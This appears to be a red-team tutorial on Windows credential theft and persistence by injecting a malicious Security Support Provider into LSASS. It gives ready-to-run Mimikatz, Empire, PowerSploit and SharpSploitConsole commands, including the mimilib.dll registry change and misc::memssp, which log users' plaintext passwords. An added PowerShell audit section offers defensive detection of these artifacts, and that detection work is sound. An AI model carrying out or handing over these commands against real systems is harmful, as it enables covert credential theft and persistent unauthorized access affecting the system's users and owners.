Security Support Provider (SSP) is a Windows API used to extend the Windows authentication mechanism. The LSASS process loads the security support provider DLLs during Windows startup. This behavior allows a red team operator either to drop an arbitrary SSP DLL in order to interact with the LSASS process and log all passwords handled by this process, or to patch the process directly with a malicious SSP without touching the disk.
This technique can be used to collect credentials on a system or on a number of systems and use these credentials in conjunction with another protocol such as RDP, WMI etc. to create persistence in the network while staying off the radar. Injection of a malicious security support provider into a host requires administrator level privileges, and there are two methods which can be used: dropping the SSP DLL to disk and registering it in the registry, or patching LSASS in memory.
Mimikatz, Empire and PowerSploit support both methods and can be utilized during a red team operation.
The project Mimikatz provides a DLL file (mimilib.dll) which can be dropped into the same location as the LSASS process (System32) in order to obtain credentials in plain-text for any user that is accessing the compromised host.
C:\Windows\System32\
After transferring the file to the above location, a registry key needs to be modified to include the new security support provider mimilib.
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
Reviewing the Security Packages registry key will verify that the malicious security support provider has been injected.
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
This method will persist across reboots since the registry value has been modified and the DLL is stored on disk. When domain users authenticate again with the system, a new file called kiwissp.log will be created that logs the credentials of the accounts.
C:\Windows\System32\kiwissp.log
Alternatively, Mimikatz supports an in-memory technique that injects LSASS with a new security support provider (SSP). This technique doesn't require mimilib.dll to be dropped to disk or the registry key to be created. However, the drawback is that it does not persist across a reboot.
privilege::debug
misc::memssp
When a user authenticates again with the system, a log file will be created in System32 that contains the password of the user in plain-text.
C:\Windows\System32\mimilsa.log
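Both Mimikatz methods leave artifacts a defender can look for: the on-disk method adds an entry to the Security Packages value and drops a DLL into System32, and both write a log file there. The following PowerShell audit is an added example and not part of the original post; the baseline package list is an assumption taken from the packages named above and should be adjusted to the Windows build being audited, since newer builds register additional packages.

```powershell
# Added example (not from the original post): audit the Security Packages value and
# the SSP DLLs it names, flagging anything outside an assumed baseline.
# Assumed baseline: the packages listed in the post. Adjust for the build you audit.
$Baseline = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u')
$LsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$System32 = Join-Path $env:SystemRoot 'System32'

function Get-SspAudit {
    # REG_MULTI_SZ is returned as a string array; an empty value (common on
    # modern builds, where the default packages are built in) yields nothing.
    $packages = (Get-ItemProperty -Path $LsaKey -Name 'Security Packages').'Security Packages' |
        Where-Object { $_ -ne '' }
    foreach ($name in $packages) {
        # Entries are loaded as <name>.dll from System32 unless given as a full path.
        $dll = if ([System.IO.Path]::IsPathRooted($name)) { $name } else { Join-Path $System32 "$name.dll" }
        $exists = Test-Path -LiteralPath $dll
        $sig = if ($exists) { (Get-AuthenticodeSignature -FilePath $dll).Status } else { 'Missing' }
        [pscustomobject]@{
            Package    = $name
            InBaseline = ($Baseline -contains $name)
            DllPath    = $dll
            Signature  = $sig
            # Unknown package names or unsigned/missing DLLs deserve a closer look.
            Suspicious = (-not ($Baseline -contains $name)) -or ($sig -ne 'Valid')
        }
    }
}

function Get-SspLogArtifacts {
    # Log files the post says mimilib (kiwissp.log) and memssp (mimilsa.log) write to System32.
    foreach ($log in 'kiwissp.log', 'mimilsa.log') {
        $path = Join-Path $System32 $log
        if (Test-Path -LiteralPath $path) {
            Get-Item -LiteralPath $path | Select-Object FullName, Length, LastWriteTime
        }
    }
}

Get-SspAudit | Format-Table -AutoSize
Get-SspLogArtifacts
```

This is a point-in-time check; alerting on writes to the Security Packages value (for example via Sysmon registry value set events) catches the on-disk method as it happens, while the in-memory method only shows up through the log file or LSASS memory inspection.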
Empire provides two modules which can be used to enumerate existing SSPs and to install a malicious SSP on the target system. The enumeration module uses the active agent by default and doesn't require any additional configuration.
usemodule persistence/misc/get_ssps
execute
Similarly, querying the registry directly will return the SSPs that are registered.
shell reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
Copying the malicious security support provider to System32 and updating the registry key will conclude the technique.
shell copy mimilib.dll C:\Windows\System32\
The process can be automated, as Empire contains a module that will automatically copy the DLL file to System32 and create the registry key. The only requirement is to set the path of the mimilib.dll file on the host.
usemodule persistence/misc/install_ssp*
set Path C:\Users\Administrator\mimilib.dll
execute
Empire also supports a module which can execute custom Mimikatz commands.
usemodule credentials/mimikatz/command
set Command misc::memssp
execute
The injection of the malicious SSP into the memory of the process is also supported by Empire. The following module will invoke the Mimikatz script and execute the memssp command directly, as another way to automate the technique.
usemodule persistence/misc/memssp*
execute
PowerSploit contains two scripts which can perform the same task. Using the PowerShell variation of Mimikatz, "Invoke-Mimikatz", the following commands will use the in-memory technique.
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command "misc::memssp"
Alternatively, transferring the malicious SSP DLL file to the target host and using the module Install-SSP will copy the DLL to System32 and modify the relevant registry key automatically.
Import-Module .\PowerSploit.psm1
Install-SSP -Path .\mimilib.dll
Mimikatz is integrated into SharpSploitConsole, an application designed to interact with SharpSploit, which was released by Ryan Cobb. SharpSploit is a .NET post-exploitation library with capabilities similar to PowerSploit. Currently SharpSploitConsole supports the in-memory technique through the Mimikatz module.
SharpSploitConsole_x64.exe Interact
Mimi-Command misc::memssp